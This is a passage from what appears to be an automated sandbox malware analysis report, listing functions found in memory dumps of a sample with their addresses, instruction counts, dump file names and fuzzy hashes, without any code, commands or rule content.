                                      • Opcode ID: 704c8601dc5c289df6d76a81b76eaa5fbd8412a086acea7f7cedbfa00014573b
                                      • Instruction ID: 4af5e1481425b1251702ab3e0ee745b590f623b1c181041b8c6b72e6e79fe2cb
                                      • Opcode Fuzzy Hash: 704c8601dc5c289df6d76a81b76eaa5fbd8412a086acea7f7cedbfa00014573b
                                      • Instruction Fuzzy Hash: 45518A30B003018FCB25DF28D89496EBBF2FFC921071485A9D45ADB3A5DB70ED058BA1
                                      Function 0BBEA194 Relevance: .1, Instructions: 144COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e5d3155f984894b1ef14edbbf01bc2167148610b835724c0662952d92becebeb
                                      • Instruction ID: 26a14b7a1d624cd210a9822785af69047e8feda1cb83fdf63737bdc3feb374ce
                                      • Opcode Fuzzy Hash: e5d3155f984894b1ef14edbbf01bc2167148610b835724c0662952d92becebeb
                                      • Instruction Fuzzy Hash: 3C51ACB4D012589FDF24CFA9D984A9EFBB1FF09300F20906AE818BB261DB359945CF54
                                      Function 0B6B25D8 Relevance: .1, Instructions: 141COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5c43deee057f09cd997e0588672126942257644e96c91a8e0eee1dfbaa1e5379
                                      • Instruction ID: 98a05aa78760b9a8d149fd55fa3fbad8b89ad7062317ebfb0e30970e61763012
                                      • Opcode Fuzzy Hash: 5c43deee057f09cd997e0588672126942257644e96c91a8e0eee1dfbaa1e5379
                                      • Instruction Fuzzy Hash: 2E51BFB4E04218DBDB14DFA9D8949DDBBF6BB89310F14912AD815BB308E73099868F19
                                      Function 0BBEA1A0 Relevance: .1, Instructions: 141COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 261ed723746a104a3792bd804685ea0e04673da76ad682813bf2fbae3f437d76
                                      • Instruction ID: 0a1d7ffe8d8d95927d75eff428aa4ddf5bdb8706d8effc3ad89be354dd30aa8e
                                      • Opcode Fuzzy Hash: 261ed723746a104a3792bd804685ea0e04673da76ad682813bf2fbae3f437d76
                                      • Instruction Fuzzy Hash: F551BCB4D012589FDF24CFA9D980A9EFBB1BF09300F20906AE818B7251DB359945CF54
                                      Function 0B6B25C8 Relevance: .1, Instructions: 135COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 32efd24db542d6970f652f05499bec4218baf1b60b3032fee3f85d20d37041e4
                                      • Instruction ID: c78a470a560def739c06d0c26d7f14aefa0a5ee1045677384de40d7b314a267d
                                      • Opcode Fuzzy Hash: 32efd24db542d6970f652f05499bec4218baf1b60b3032fee3f85d20d37041e4
                                      • Instruction Fuzzy Hash: AD51CFB4E04218CFDB14DFA9D8549DDBBF2BB99310F10912AD816BB358EB309946CF18
                                      Function 0B6B0869 Relevance: .1, Instructions: 124COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b75a0c3c6c9254d786af65263d12de23bcceb4da5d84ebcf403591ad2c232250
                                      • Instruction ID: e4197cb264400e7a0a8c28cfa5d270707638249632890c890ee779e3c4532102
                                      • Opcode Fuzzy Hash: b75a0c3c6c9254d786af65263d12de23bcceb4da5d84ebcf403591ad2c232250
                                      • Instruction Fuzzy Hash: 50513974E14228CFDB64DF64D880B9DBBB2FF89210F1095AAD50EB7352D7309A828F15
                                      Function 0BBE207E Relevance: .1, Instructions: 120COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d35832a4c2925fa1bf52cebd6f0fdd073a2528e5d1be2ff775600894be1d370a
                                      • Instruction ID: bf3e801fd3e05a10e29ea6623ca8da8b2d9b02d745a40d45ffc221296a02e9e5
                                      • Opcode Fuzzy Hash: d35832a4c2925fa1bf52cebd6f0fdd073a2528e5d1be2ff775600894be1d370a
                                      • Instruction Fuzzy Hash: 73510F31A00229DFDB65DFA4D840B98BBB2FF88310F1581D9E509AB271DB319E80CF91
                                      Function 0BBE2AAF Relevance: .1, Instructions: 112COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1ea95e5d43e9a21839a0dcb532cca625e1fd901cdeb099eeeeff2dba3f6a3d2c
                                      • Instruction ID: 86d9f58c90acf753e025acaabd1cbc6d07250e63df19b1cb1d2e6b583fbc3ada
                                      • Opcode Fuzzy Hash: 1ea95e5d43e9a21839a0dcb532cca625e1fd901cdeb099eeeeff2dba3f6a3d2c
                                      • Instruction Fuzzy Hash: 22413FB5D042589FEB20DFA8D880ACEBBB5EF08310F24946AE424AB250D7709886CF44
                                      Function 0BBE2B08 Relevance: .1, Instructions: 97COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8f909942fe44812be22171dff69f40210428ded1ccd2dfdfb45a02a4f8e32b8e
                                      • Instruction ID: 5209abfc81436ecc45f76009fd73f2d05a2925963d7eae4701fd2c497941f26c
                                      • Opcode Fuzzy Hash: 8f909942fe44812be22171dff69f40210428ded1ccd2dfdfb45a02a4f8e32b8e
                                      • Instruction Fuzzy Hash: 2741BAB4D042589FDB20DFA9D984A9EBBB9BF08300F20902AE818BB250D7719845CF54
                                      Function 0BBE2AFC Relevance: .1, Instructions: 97COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 224991632a7576b3cdcbe9ae49abb8377b706944c592301d8b74350097abcced
                                      • Instruction ID: 68734600f368b4326c411283ddf775a79f5dbc3868faf2a77b368bf1fa20e212
                                      • Opcode Fuzzy Hash: 224991632a7576b3cdcbe9ae49abb8377b706944c592301d8b74350097abcced
                                      • Instruction Fuzzy Hash: 7541BBB4D00258DFDB20DFE9D984A9EBBB5BF08300F20942AE818BB360D7719945CF54
                                      Function 0BBEF928 Relevance: .1, Instructions: 95COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3c387150f9526cf1a4a002c90e30077a1fc947c2699f2a3a1fe4d51e2c4892cd
                                      • Instruction ID: 991a695aad6a9e5fe2ce6fffa6b323059bf56a2f462889b4204f04a5a5b05255
                                      • Opcode Fuzzy Hash: 3c387150f9526cf1a4a002c90e30077a1fc947c2699f2a3a1fe4d51e2c4892cd
                                      • Instruction Fuzzy Hash: 9B416F75E0021A9FDB05DFA8D9509EDFBB2FF89310F108656D464BB264D730A906CB90
                                      Function 0B6B1688 Relevance: .1, Instructions: 93COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ce06d6711f67501621f922f7c5328b3c1a01047654a17872c84c9fbcf4cdee1e
                                      • Instruction ID: b2e913258728297deaca5fa60c7ba08ca149946e0373219d36c8f717d917106f
                                      • Opcode Fuzzy Hash: ce06d6711f67501621f922f7c5328b3c1a01047654a17872c84c9fbcf4cdee1e
                                      • Instruction Fuzzy Hash: 9B416FB1E1121E9FCB04CFA9D6509EEBBF2FF89310F608569D115BB250E7309A46CB90
                                      Function 0BBEF918 Relevance: .1, Instructions: 93COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a37c53651e544234ddec6eaa30d38b6e60fd3749c7d09d8ef56f2cc8061501dc
                                      • Instruction ID: bd528ddcbdc66fed0ceb7b9c0f6673a214fcc09f4ea7781f19c89eb803cdd128
                                      • Opcode Fuzzy Hash: a37c53651e544234ddec6eaa30d38b6e60fd3749c7d09d8ef56f2cc8061501dc
                                      • Instruction Fuzzy Hash: 4A414E75E0021A9FDF05DFA8D550AEDFBB2FF88310F108666D465BB264D730AA06CB54
                                      Function 0BBE3B60 Relevance: .1, Instructions: 90COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3e5977b732ac67f2fbb0b81c40fb9af3176f7c158e4cf98f99e717c928ac6911
                                      • Instruction ID: c7641d685acd80c4478b11816cee316f26e31766e1ec6bdbc5de521e93ac19bc
                                      • Opcode Fuzzy Hash: 3e5977b732ac67f2fbb0b81c40fb9af3176f7c158e4cf98f99e717c928ac6911
                                      • Instruction Fuzzy Hash: 92317A74A003059FCB25DF38D99486EBBF2FFD82057148669C44A9B365DB30ED05CBA1
                                      Function 0BBE25A0 Relevance: .1, Instructions: 90COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ffeb64950719c37b94b44ac959f9f43f41da7b5e9df16718fbe896fc8855d92c
                                      • Instruction ID: 04efb0765f5d336b99f4b2b6f301700e0a5143581e11d694740e6eb8b3f73bf2
                                      • Opcode Fuzzy Hash: ffeb64950719c37b94b44ac959f9f43f41da7b5e9df16718fbe896fc8855d92c
                                      • Instruction Fuzzy Hash: B931DCB4D01258DFCB14DFEADA84A9EFBF5BB48300F20856AE418BB260DB749945CF54
                                      Function 0BBEE602 Relevance: .1, Instructions: 88COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: af19a87de80b67c2849872fd10202b315d981b9dfb07c4db94cf99b26e9458e9
                                      • Instruction ID: 22c4fbedec181a70ffd6ed5c94180df13d3e8d4261da1b547b4826289a22b6c9
                                      • Opcode Fuzzy Hash: af19a87de80b67c2849872fd10202b315d981b9dfb07c4db94cf99b26e9458e9
                                      • Instruction Fuzzy Hash: 6D315E71E0125A9FCB08CFA8D5509EEBBF2FF88310F10856AE415B7264D730D906CB65
                                      Function 0BBEE610 Relevance: .1, Instructions: 87COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b0fd2207506a6e9162c8a1e225f54a68a6cf08d0ada725a5b196518442a02a0c
                                      • Instruction ID: 12248a0ac2f5c9f11a26b046c759ff68140d96a9cafbae384139c364a85c7cf7
                                      • Opcode Fuzzy Hash: b0fd2207506a6e9162c8a1e225f54a68a6cf08d0ada725a5b196518442a02a0c
                                      • Instruction Fuzzy Hash: EC314D70E0125A9FCB04CFA8D9449EEBBF2FF89310F508565E415B7264D730E906CB65
                                      Function 0BBE25B8 Relevance: .1, Instructions: 83COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f374dda0bf9c7bd6b9e57c694a63e423d19f5799ae7d2aa6a553cb3e4fa50180
                                      • Instruction ID: 660108b984078adb2c7d7aa1cffe28b194243dc0fc1fc180580b4f5d3b830d73
                                      • Opcode Fuzzy Hash: f374dda0bf9c7bd6b9e57c694a63e423d19f5799ae7d2aa6a553cb3e4fa50180
                                      • Instruction Fuzzy Hash: 1131DCB4D012589FCB14DFEAD984A9EFBF9BB09300F20812AE418BB250DB749945CF64
                                      Function 0BBE24B0 Relevance: .1, Instructions: 83COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f976ba62d49dec481239956677e7d32b1b18e82b441661550057e110b7a7e4b4
                                      • Instruction ID: 20950b3934f995f57bee7d37c5d27cb3041d29b1f209d87b3d4e2a57fb6bd288
                                      • Opcode Fuzzy Hash: f976ba62d49dec481239956677e7d32b1b18e82b441661550057e110b7a7e4b4
                                      • Instruction Fuzzy Hash: 7F21A133F002098BEF28CAA9D9153EE77FAAFC8210F1444BAD519E7160EB348D0597A1
                                      Function 0BBE2C70 Relevance: .1, Instructions: 83COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 54e4fa97da03f2e9380f85f27838e83d4107512bc12d7700557c87284448045c
                                      • Instruction ID: 36be38743fbb5774ad181882049149df30306bd26d579527ddda35067a9f1b4d
                                      • Opcode Fuzzy Hash: 54e4fa97da03f2e9380f85f27838e83d4107512bc12d7700557c87284448045c
                                      • Instruction Fuzzy Hash: 4721BF31E002188FDB29DBA4D8112EDBBF6BF88300F208569D806BB390CF745D059BA6
                                      Function 0BBE84A8 Relevance: .1, Instructions: 77COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2abd040b23d0d3887fcc4e83aecdd7ec3b0d13296068e2aa28fa98f03699e321
                                      • Instruction ID: 96a5e878234a1452dac6081e013559c6cedc09d2cc0276f6ec28e24e91fc66cb
                                      • Opcode Fuzzy Hash: 2abd040b23d0d3887fcc4e83aecdd7ec3b0d13296068e2aa28fa98f03699e321
                                      • Instruction Fuzzy Hash: EE3105B4E002198FDB14CFA9C844AAEBBF2FF89300F10816AD529B7310EB309941CF65
                                      Function 0BBE8498 Relevance: .1, Instructions: 74COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d4218fe993b63ad58f77ab9242f5cb6bb660da946ddb8dd0ec5fb9d7a0fa764e
                                      • Instruction ID: f9ecc427338cbd56f87b40cce46b44e1b0cdea7f5647f0e3e7e2495c88287a24
                                      • Opcode Fuzzy Hash: d4218fe993b63ad58f77ab9242f5cb6bb660da946ddb8dd0ec5fb9d7a0fa764e
                                      • Instruction Fuzzy Hash: 8531F5B4E046198FDB14DFA9C844AAEBBF2FF89300F1085AAC425B7351EB309941CF65
                                      Function 0B6B423F Relevance: .1, Instructions: 69COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3716059243.000000000B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B6B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b6b0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bf871d4dd4859ff0d706c1c2c34b6daf8f4d1da7cf519d7e76acafc1685d1b3f
                                      • Instruction ID: e40ba328e7fe9649022f73957ee7bc4fe341eba01bffa5938b6ff8dbcc9a8d60
                                      • Opcode Fuzzy Hash: bf871d4dd4859ff0d706c1c2c34b6daf8f4d1da7cf519d7e76acafc1685d1b3f
                                      • Instruction Fuzzy Hash: 35215CB1D04348AFCB65DFA8D805AEDBFB0BF46320F0482AAD815A7392D7314995DB91
                                      Function 0BBE39B8 Relevance: .1, Instructions: 66COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 526555889ad75c39cbf9510ccf5afc3644538315122d40c01d8a146f4bd4a092
                                      • Instruction ID: d54a337cdd0e65c463df0d9fe575512a8fbd048baa3dde5633514a82712b3db3
                                      • Opcode Fuzzy Hash: 526555889ad75c39cbf9510ccf5afc3644538315122d40c01d8a146f4bd4a092
                                      • Instruction Fuzzy Hash: E9215130A003159FDB21EF64D88599EBBF2EFC42417108A29D4569F265EF74BE0ACBD1
                                      Function 0BBE39C8 Relevance: .1, Instructions: 61COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c1fe5ccca03758a166e3f37b6f0c52b02befabac9a69b3bfce75c7a8bc6c43ab
                                      • Instruction ID: 9cac08e408dffb5d301823e24f2ba92f169b0eab3e09e624a0c5f6340adaf7b9
                                      • Opcode Fuzzy Hash: c1fe5ccca03758a166e3f37b6f0c52b02befabac9a69b3bfce75c7a8bc6c43ab
                                      • Instruction Fuzzy Hash: 5D114234A007159FDB21EF64D84199FBBF2EFC42517108A29D4559B254EF70BE0A8BD1
                                      Function 0BBE7F60 Relevance: .1, Instructions: 61COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 423eb23e2872e453cc85c2adeef1d1c050cf9f1c262e092c215ae8852a3c147d
                                      • Instruction ID: 698b077d06837a861604b9e03d1a5694e469c8170f1c914f1a687c32deff2520
                                      • Opcode Fuzzy Hash: 423eb23e2872e453cc85c2adeef1d1c050cf9f1c262e092c215ae8852a3c147d
                                      • Instruction Fuzzy Hash: E01165373042009BC3155A6AF884D6BB799FFC9266760807EF119C6340CB36DD02C7A0
                                      Function 0BBE0F10 Relevance: .1, Instructions: 56COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b0215a663d6b9fa756601ca36d91dd9a7c9c2babfed90a2a0657aaa03dd9bb00
                                      • Instruction ID: e8921c4f0170344fdb8bb3c5e48e11e5c93c45d5359c01f164a39d30173b2412
                                      • Opcode Fuzzy Hash: b0215a663d6b9fa756601ca36d91dd9a7c9c2babfed90a2a0657aaa03dd9bb00
                                      • Instruction Fuzzy Hash: 78118E35B10218AFC704EF68E4449AEBBB2FF98310B50C126E9169B350DB30DE15CBD1
                                      Function 0BBE30E0 Relevance: .1, Instructions: 55COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cfb2d52e462c44314a4611a71a5d284e0a35428ee64aadeedd1494de2d19f1f8
                                      • Instruction ID: 04887507f3f9d978e242920cc2b9f0d0dd025c5a24f90aca120b8d30ad6016c1
                                      • Opcode Fuzzy Hash: cfb2d52e462c44314a4611a71a5d284e0a35428ee64aadeedd1494de2d19f1f8
                                      • Instruction Fuzzy Hash: EA118C71A00206AFCB15CFA4D8949AABBF5FF88310B10857DE926D3250DB31EA11CBA1
                                      Function 0BBE0F02 Relevance: .0, Instructions: 50COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 85b957821ee7620f8e05aee54a154cfa7736dac8d77b64d9d57175805b39c643
                                      • Instruction ID: e5707999da7fbab61fcbcd88d0dbe129cf90d01652cdc11c56af15b615986241
                                      • Opcode Fuzzy Hash: 85b957821ee7620f8e05aee54a154cfa7736dac8d77b64d9d57175805b39c643
                                      • Instruction Fuzzy Hash: 0A118C34B10219AFC714DF64E454AAEBBB2FF98310B15C12AD8169B394CB309E02CB91
                                      Function 0BBEEBD6 Relevance: .0, Instructions: 46COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9789e50f911ae0d46659066070881298e960d96b952fb64048a1353db4d9d102
                                      • Instruction ID: b081e3ed05d3f408de092a98a26ce0510f864447125388cf0a06c14956c435c2
                                      • Opcode Fuzzy Hash: 9789e50f911ae0d46659066070881298e960d96b952fb64048a1353db4d9d102
                                      • Instruction Fuzzy Hash: 34013970E025098BCB44CF69D9406DCF7F2AB89210F14D0A6E12AE7265EB30D9058F64
                                      Function 0BBE3AD8 Relevance: .0, Instructions: 46COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 86198644070218bed4a847797e783806256eb975bc8756673e012041b09bcd38
                                      • Instruction ID: a81f4570e90d3992fa296c079c7146bdc996fb1f3493cf567e7112835b3bfd89
                                      • Opcode Fuzzy Hash: 86198644070218bed4a847797e783806256eb975bc8756673e012041b09bcd38
                                      • Instruction Fuzzy Hash: 0AF09031B002641FEB68A27E182572F66C79FCD595B6084B9D50ECB394ED28DE0283D6
                                      Function 0BBE3AC8 Relevance: .0, Instructions: 46COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f7f85039716c040218139fd84cd0d21cc80fe304b4c16a27983cbac80537dbee
                                      • Instruction ID: cbc01fa1e1253d199fc1079af1744bc995d3281225a341413bb28addc3e90622
                                      • Opcode Fuzzy Hash: f7f85039716c040218139fd84cd0d21cc80fe304b4c16a27983cbac80537dbee
                                      • Instruction Fuzzy Hash: 30F0F631B002500FEB18A3BD082132E15D38FCD195B2484FAD10ADB3D5ED28CE0243C6
                                      Function 0BBE0DA0 Relevance: .0, Instructions: 46COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3717297457.000000000BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BBE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_bbe0000_3u8A2xjbBT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 633bfb879d85980cdcf98d98d65914f3468ca0b3703a84a4444aaa5307f655a1
                                      • Instruction ID: f1b4483f08765d69ca04afd2bdcc46155e0bc44fb0802a2fd46fd945c622b500
                                      • Opcode Fuzzy Hash: 633bfb879d85980cdcf98d98d65914f3468ca0b3703a84a4444aaa5307f655a1
